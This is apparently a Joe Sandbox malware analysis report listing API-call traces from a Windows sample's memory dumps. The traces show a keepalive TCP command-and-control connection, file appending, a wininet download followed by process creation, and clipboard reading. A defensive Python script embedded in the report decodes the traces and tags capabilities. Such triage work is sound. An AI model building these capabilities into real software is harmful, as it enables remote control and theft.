                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateThread$CloseHandlegethostbynameinet_addrinet_ntoamemcpystrcpy
                                                                    • String ID:
                                                                    • API String ID: 3029021308-0
                                                                    • Opcode ID: 6493bf8843dc290fb4396dfcf6482e2c31f5c838a3d30255e9b01652ef6ba7f9
                                                                    • Instruction ID: b07fb4e7fcf8aad133efbee6d2bff36546558eae7963b8b8def562a48d110def
                                                                    • Opcode Fuzzy Hash: 6493bf8843dc290fb4396dfcf6482e2c31f5c838a3d30255e9b01652ef6ba7f9
                                                                    • Instruction Fuzzy Hash: ED1136B550425DBFFB009FA4DCC4CAA3BECEB452E47128125F908CA265DB30ED808BA0
                                                                    APIs
                                                                    • inet_addr.WS2_32(?), ref: 10002588
                                                                    • gethostbyname.WS2_32(?), ref: 10002598
                                                                    • memcpy.MSVCRT(?,?,?), ref: 100025B0
                                                                    • inet_ntoa.WS2_32(?), ref: 100025BB
                                                                    • strcpy.MSVCRT(10014E04,?), ref: 100025C7
                                                                    • CreateThread.KERNEL32(00000000,00000000,10002154,00000000,00000000,00000000), ref: 100025F2
                                                                    • CloseHandle.KERNEL32(00000000), ref: 100025F5
                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_000024EB,00000000,00000000,00000000), ref: 1000261B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateThread$CloseHandlegethostbynameinet_addrinet_ntoamemcpystrcpy
                                                                    • String ID:
                                                                    • API String ID: 3029021308-0
                                                                    • Opcode ID: 57f54bb60699ed109542a624fa8abe98603303e75bf271e062f7e88050f24bf1
                                                                    • Instruction ID: 629364bdcd34cfa53ab5f708bcafb15ef3074922faf6b1aae38d232b2a9931fa
                                                                    • Opcode Fuzzy Hash: 57f54bb60699ed109542a624fa8abe98603303e75bf271e062f7e88050f24bf1
                                                                    • Instruction Fuzzy Hash: 6D113AB5501259BFFB009F64DCC4CAA3BECEB452E57168525F909C6265DB31ED808B60
                                                                    APIs
                                                                    • inet_addr.WS2_32(?), ref: 10002993
                                                                    • gethostbyname.WS2_32(?), ref: 100029A3
                                                                    • memcpy.MSVCRT(?,?,?), ref: 100029BB
                                                                    • inet_ntoa.WS2_32(?), ref: 100029C6
                                                                    • strcpy.MSVCRT(10014E04,?), ref: 100029D2
                                                                    • CreateThread.KERNEL32(00000000,00000000,10002154,00000000,00000000,00000000), ref: 100029FD
                                                                    • CloseHandle.KERNEL32(00000000), ref: 10002A00
                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_0000262C,00000000,00000000,00000000), ref: 10002A26
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateThread$CloseHandlegethostbynameinet_addrinet_ntoamemcpystrcpy
                                                                    • String ID:
                                                                    • API String ID: 3029021308-0
                                                                    • Opcode ID: 83d9a5acb80fea125ccfb2012910954748ebf1ccbb30d9e4ee0d7e62ea42ef5d
                                                                    • Instruction ID: 8e95c2826898587ef7ccda52250b5cb9b2d76626100f07937a606723e6195a85
                                                                    • Opcode Fuzzy Hash: 83d9a5acb80fea125ccfb2012910954748ebf1ccbb30d9e4ee0d7e62ea42ef5d
                                                                    • Instruction Fuzzy Hash: AD113AB550025DBFFB00DFA4DCC4CAA7BECEB452E47168126F905C6265DB31DD808BA0
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0041264D
                                                                    • memset.MSVCRT ref: 00412660
                                                                    • memset.MSVCRT ref: 0041266E
                                                                    • LoadLibraryA.KERNEL32(100140CC,?,?,?,?,?,?,?,00000104,00000000), ref: 0041267B
                                                                    • lstrcpy.KERNEL32(00000000,?), ref: 00412834
                                                                    • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,00000104,00000000), ref: 00412858
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: memset$Library$FreeLoadlstrcpy
                                                                    • String ID:
                                                                    • API String ID: 3185261140-0
                                                                    • Opcode ID: 0ffad9cd750d37a4f8673343d1f702e8677341e97ff82641447f6cf9ec524642
                                                                    • Instruction ID: 99cbbd0a13abc2d66761d7bdabc70822120ec9568554f5a589967dca830a500d
                                                                    • Opcode Fuzzy Hash: 0ffad9cd750d37a4f8673343d1f702e8677341e97ff82641447f6cf9ec524642
                                                                    • Instruction Fuzzy Hash: B361F87190025DABDF21EFA1CD84EEFBBB9FB08304F1001AAF915E2150D7759EA58B64
                                                                    APIs
                                                                    • memcpy.MSVCRT(?,?,00000170), ref: 0040D72A
                                                                    • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 0040D75D
                                                                    • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0040D780
                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040D792
                                                                    • strlen.MSVCRT ref: 0040D79F
                                                                    • wsprintfA.USER32 ref: 0040D7C3
                                                                    • lstrcpy.KERNEL32(?,?), ref: 0040D7DC
                                                                      • Part of subcall function 0040D51B: memset.MSVCRT ref: 0040D537
                                                                      • Part of subcall function 0040D51B: strlen.MSVCRT ref: 0040D57E
                                                                      • Part of subcall function 0040D51B: memset.MSVCRT ref: 0040D5E4
                                                                      • Part of subcall function 0040D51B: wsprintfA.USER32 ref: 0040D5FC
                                                                      • Part of subcall function 0040D51B: memset.MSVCRT ref: 0040D60B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: memset$Filestrlenwsprintf$CloseCreateHandleWritelstrcpymemcpy
                                                                    • String ID:
                                                                    • API String ID: 1942971391-0
                                                                    • Opcode ID: d13039a4b9e5cc068fceb6d55ee45ef0f6c190212da61e3b15bc8a86ec381b56
                                                                    • Instruction ID: 47e53453467552c116f620483278b5e9df91a522f88cc874ad7efcd27dae7bb0
                                                                    • Opcode Fuzzy Hash: d13039a4b9e5cc068fceb6d55ee45ef0f6c190212da61e3b15bc8a86ec381b56
                                                                    • Instruction Fuzzy Hash: AA31507390421CAAEB20DBE4CC89FDB776C9B09354F1041B7F619F21C1EA759E898B64
                                                                    APIs
                                                                      • Part of subcall function 00409E60: setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 00409E85
                                                                      • Part of subcall function 00409E60: CancelIo.KERNEL32(?,?,?,?,00409A9F), ref: 00409E8E
                                                                      • Part of subcall function 00409E60: InterlockedExchange.KERNEL32(?,00000000), ref: 00409E9A
                                                                      • Part of subcall function 00409E60: closesocket.WS2_32(?), ref: 00409EA3
                                                                      • Part of subcall function 00409E60: SetEvent.KERNEL32(?,?,?,?,00409A9F), ref: 00409EAC
                                                                    • ResetEvent.KERNEL32(?), ref: 00409AA2
                                                                    • socket.WS2_32(00000002,00000001,00000006), ref: 00409AB3
                                                                    • gethostbyname.WS2_32(?), ref: 00409AC4
                                                                    • htons.WS2_32(?), ref: 00409AD9
                                                                    • connect.WS2_32(?,00000002,00000010), ref: 00409AF6
                                                                    • setsockopt.WS2_32(?,0000FFFF,00000008,?,00000004), ref: 00409B1B
                                                                    • WSAIoctl.WS2_32(0000000C,98000004,?,0000000C,00000000,00000000,?,00000000,00000000), ref: 00409B4C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Eventsetsockopt$CancelExchangeInterlockedIoctlResetclosesocketconnectgethostbynamehtonssocket
                                                                    • String ID:
                                                                    • API String ID: 4281462294-0
                                                                    • Opcode ID: 932793c469b544b11e4b241f13170b231aa34aa6681c2130a40818cef7a9eba3
                                                                    • Instruction ID: 65c3a029619327615ef4a9c2bdadc02f42618da053e5281480e2fccca2ba9e06
                                                                    • Opcode Fuzzy Hash: 932793c469b544b11e4b241f13170b231aa34aa6681c2130a40818cef7a9eba3
                                                                    • Instruction Fuzzy Hash: 1B218171500318BFEB109FA5CC85EEBBBBDEF08364F00452AF201A62E1D7B59D448B64
                                                                    APIs
                                                                    • CreateFileA.KERNEL32(10009BAE,40000000,00000002,00000000,00000004,00000080,00000000,Rsjshd fzfgkqcm,00000104,00000000), ref: 100089A1
                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 100089BA
                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 100089C2
                                                                    • WriteFile.KERNEL32(10009BAE,?,00000400,?,00000000), ref: 10008A38
                                                                    • CloseHandle.KERNEL32(10009BAE), ref: 10008A49
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: File$CloseCreateHandlePointerSizeWrite
                                                                    • String ID: Rsjshd fzfgkqcm
                                                                    • API String ID: 1886887421-3753134293
                                                                    • Opcode ID: 7968883ead0f57cd96c7908dc12ccf6293502afa04708cabb66c95fa5f9433b7
                                                                    • Instruction ID: 4666eb284188271ef756a82573d973c6ea2c4ab6db8dc4beb41906ae3c0cabb2
                                                                    • Opcode Fuzzy Hash: 7968883ead0f57cd96c7908dc12ccf6293502afa04708cabb66c95fa5f9433b7
                                                                    • Instruction Fuzzy Hash: 3C21C171900218FFFB119F68CCC4AED7BB9EB857C1F10816AFB41A6185C7304E468B55
                                                                    APIs
                                                                    • strlen.MSVCRT ref: 0040DB34
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000001), ref: 0040DB48
                                                                    • memcpy.MSVCRT(00000000,?,00000001,00000001), ref: 0040DB54
                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040DBBB
                                                                      • Part of subcall function 0040D9EE: LoadLibraryA.KERNEL32(100120D8), ref: 0040DA12
                                                                      • Part of subcall function 0040D9EE: FreeLibrary.KERNEL32(00000000), ref: 0040DA61
                                                                      • Part of subcall function 00412479: GetFileAttributesA.KERNEL32(00000001,0040DB7C,00000001), ref: 0041247D
                                                                      • Part of subcall function 00412479: GetLastError.KERNEL32 ref: 00412488
                                                                    • CreateProcessA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 0040DBAC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Library$??2@??3@AttributesCreateErrorFileFreeLastLoadProcessmemcpystrlen
                                                                    • String ID: D
                                                                    • API String ID: 3530698900-2746444292
                                                                    • Opcode ID: 671067e8ef1846a81141077b585d28d48d3980d5da1a1c07d8c56620a32c1c03
                                                                    • Instruction ID: 02d6abb6fce6944c4b7c04b381117456e553187659861697214afee7e54a008d
                                                                    • Opcode Fuzzy Hash: 671067e8ef1846a81141077b585d28d48d3980d5da1a1c07d8c56620a32c1c03
                                                                    • Instruction Fuzzy Hash: 080126B79012253ADB20A7E59D01DDF77ACDF04365F10003BFA01F6182DAFC995982E8
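The function blocks on this page list their API calls with raw hexadecimal arguments: the socket/connect/setsockopt/WSAIoctl routine at 00409AB3, the CreateFileA/SetFilePointer/WriteFile routine at 100089A1, and the wininet-plus-CreateProcessA routines at 0040DB34 and (below) 10005AE8. The Python below is an added example, not part of the Joe Sandbox report and not code from the sample: it parses lines in the report's "api.MODULE(args), ref: addr" format, decodes the constants a triager otherwise looks up by hand (SOL_SOCKET/SO_KEEPALIVE, SIO_KEEPALIVE_VALS, CreateFileA access/share/disposition, FILE_END, and the 0x44 STARTUPINFOA size that appears as the "D" String ID), and tags each function with a coarse capability in the spirit of the report's signature list. The capability names, the tag rules and the sample blocks (copied from the lines on this page) are this example's own choices; the constant values are from the public Windows SDK headers.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Joe Sandbox prints one API call per line: "<api>.<module>(<args>), ref: <addr>",
# optionally prefixed with "Part of subcall function <addr>:". Each argument is an
# 8-hex-digit value, a literal string, or "?" when the sandbox could not recover it.
LINE_RE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>[^.\s(]+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>.*)\))?"
    r"(?:,?\s*ref:\s*(?P<ref>[0-9A-F]+))?\s*$"
)

# Winsock / kernel32 constants (values from the Windows SDK headers).
SOL_SOCKET, SIO_KEEPALIVE_VALS = 0xFFFF, 0x98000004
SOCK_OPTS = {0x0004: "SO_REUSEADDR", 0x0008: "SO_KEEPALIVE", 0x0080: "SO_LINGER"}
ACCESS_BITS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE"}
SHARE_BITS = {1: "FILE_SHARE_READ", 2: "FILE_SHARE_WRITE", 4: "FILE_SHARE_DELETE"}
CREATE_DISP = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
MOVE_METHOD = {0: "FILE_BEGIN", 1: "FILE_CURRENT", 2: "FILE_END"}


@dataclass
class Call:
    api: str
    module: str
    args: list                      # int for 8-hex-digit values, str otherwise
    ref: Optional[str]
    subcall: Optional[str] = None   # callee address when listed as "Part of subcall"
    notes: List[str] = field(default_factory=list)


def parse_line(line: str) -> Optional[Call]:
    m = LINE_RE.match(line)
    if not m:
        return None
    args = []
    for a in (m.group("args") or "").split(","):
        a = a.strip()
        if a:
            args.append(int(a, 16) if re.fullmatch(r"[0-9A-F]{8}", a) else a)
    return Call(m.group("api"), m.group("mod"), args, m.group("ref"), m.group("sub"))


def decode_bits(value, table) -> str:
    if not isinstance(value, int):
        return str(value)
    names = [name for bit, name in table.items() if value & bit]
    return "|".join(names) or hex(value)


def annotate(call: Call) -> Call:
    """Attach human-readable meaning to the raw numeric arguments."""
    arg = lambda i: call.args[i] if i < len(call.args) else None
    if call.api == "socket" and call.args[:3] == [2, 1, 6]:
        call.notes.append("AF_INET/SOCK_STREAM/IPPROTO_TCP")
    elif call.api == "setsockopt" and arg(1) == SOL_SOCKET:
        call.notes.append("SOL_SOCKET " + (SOCK_OPTS.get(arg(2)) or str(arg(2))))
    elif call.api == "WSAIoctl" and arg(1) == SIO_KEEPALIVE_VALS:
        call.notes.append("SIO_KEEPALIVE_VALS: TCP keepalive timing set on the socket")
    elif call.api == "CreateFileA":
        call.notes.append("access=%s share=%s disp=%s" % (
            decode_bits(arg(1), ACCESS_BITS), decode_bits(arg(2), SHARE_BITS),
            CREATE_DISP.get(arg(4), str(arg(4)))))
    elif call.api == "SetFilePointer" and arg(3) in MOVE_METHOD:
        call.notes.append(MOVE_METHOD[arg(3)])
    elif call.api == "CreateProcessA" and arg(8) == 0x44:
        call.notes.append("0x44 = sizeof(STARTUPINFOA); the 'D' String ID is this byte")
    return call


def capabilities(calls: List[Call]) -> set:
    """Coarse capability tags (names chosen for this example)."""
    apis = {c.api for c in calls}
    strings = {a for c in calls for a in c.args if isinstance(a, str)}
    notes = [n for c in calls for n in c.notes]
    caps = set()
    if {"socket", "connect"} <= apis and apis & {"gethostbyname", "inet_addr"}:
        caps.add("outbound-tcp-connect")
    if any("SIO_KEEPALIVE_VALS" in n for n in notes):
        caps.add("keepalive-tuned-socket")
    if "WriteFile" in apis and any("GENERIC_WRITE" in n for n in notes):
        caps.add("file-write")
    if "CreateProcessA" in apis and strings & {"InternetOpenUrlA", "URLDownloadToFileA"}:
        caps.add("download-and-execute")
    return caps


def analyze(lines: List[str]):
    calls = [annotate(c) for c in map(parse_line, lines) if c is not None]
    return calls, capabilities(calls)


# Constructed input: API lines copied from three function blocks on this page.
C2_CONNECT = [
    "socket.WS2_32(00000002,00000001,00000006), ref: 00409AB3",
    "gethostbyname.WS2_32(?), ref: 00409AC4",
    "htons.WS2_32(?), ref: 00409AD9",
    "connect.WS2_32(?,00000002,00000010), ref: 00409AF6",
    "setsockopt.WS2_32(?,0000FFFF,00000008,?,00000004), ref: 00409B1B",
    "WSAIoctl.WS2_32(0000000C,98000004,?,0000000C,00000000,00000000,?,00000000,00000000), ref: 00409B4C",
]
APPEND_FILE = [
    "CreateFileA.KERNEL32(10009BAE,40000000,00000002,00000000,00000004,00000080,00000000,Rsjshd fzfgkqcm,00000104,00000000), ref: 100089A1",
    "SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 100089BA",
    "WriteFile.KERNEL32(10009BAE,?,00000400,?,00000000), ref: 10008A38",
]
DOWNLOAD_EXEC = [
    "Part of subcall function 100059A2: LoadLibraryA.KERNEL32(wininet.dll), ref: 100059C6",
    "Part of subcall function 100059A2: GetProcAddress.KERNEL32(00000000,InternetOpenUrlA), ref: 100059F7",
    "CreateProcessA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 10005B60",
]

if __name__ == "__main__":
    for name, block in (("c2-connect", C2_CONNECT), ("append-file", APPEND_FILE),
                        ("download-exec", DOWNLOAD_EXEC)):
        calls, caps = analyze(block)
        print(name, sorted(caps))
        for c in calls:
            print("  %s.%s @%s %s" % (c.api, c.module, c.ref, "; ".join(c.notes)))
```

Run against the three blocks, the decoder reports that the 00409AB3 routine opens an AF_INET TCP socket, resolves a host name, connects and then sets SO_KEEPALIVE plus SIO_KEEPALIVE_VALS (a long-lived C2 channel that survives NAT timeouts), that the 100089A1 routine opens a file with GENERIC_WRITE and OPEN_ALWAYS, seeks to FILE_END and appends 0x400 bytes (an append-only log), and that the 10005AE8 routine resolves InternetOpenUrlA dynamically and ends in CreateProcessA (download and execute). Tag rules keyed on resolved string arguments only fire when the sandbox recovered the strings, so a block such as 0040DB34, whose LoadLibraryA argument is only an address, still needs a manual look.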
                                                                    APIs
                                                                    • strlen.MSVCRT ref: 10005AE8
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000001), ref: 10005AFC
                                                                    • memcpy.MSVCRT(00000000,?,00000001,00000001), ref: 10005B08
                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 10005B6F
                                                                      • Part of subcall function 100059A2: LoadLibraryA.KERNEL32(wininet.dll), ref: 100059C6
                                                                      • Part of subcall function 100059A2: GetProcAddress.KERNEL32(00000000,InternetOpenA), ref: 100059DD
                                                                      • Part of subcall function 100059A2: GetProcAddress.KERNEL32(00000000,InternetOpenUrlA), ref: 100059F7
                                                                      • Part of subcall function 100059A2: FreeLibrary.KERNEL32(00000000), ref: 10005A15
                                                                      • Part of subcall function 1000A42D: GetFileAttributesA.KERNEL32(00000000,100085D6,00000000,00000000,00000000,00000000,00000000), ref: 1000A431
                                                                      • Part of subcall function 1000A42D: GetLastError.KERNEL32 ref: 1000A43C
                                                                    • CreateProcessA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 10005B60
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AddressLibraryProc$??2@??3@AttributesCreateErrorFileFreeLastLoadProcessmemcpystrlen
                                                                    • String ID: D
                                                                    • API String ID: 2949623759-2746444292
                                                                    APIs
                                                                    • OpenClipboard.USER32(00000000), ref: 1000139D
                                                                    • GetClipboardData.USER32(00000001), ref: 100013AB
                                                                    • GlobalLock.KERNEL32(00000000), ref: 100013B4
                                                                    • strlen.MSVCRT ref: 100013D3
                                                                      • Part of subcall function 10006A0B: __EH_prolog.LIBCMT ref: 10006A10
                                                                    • strlen.MSVCRT ref: 100013EA
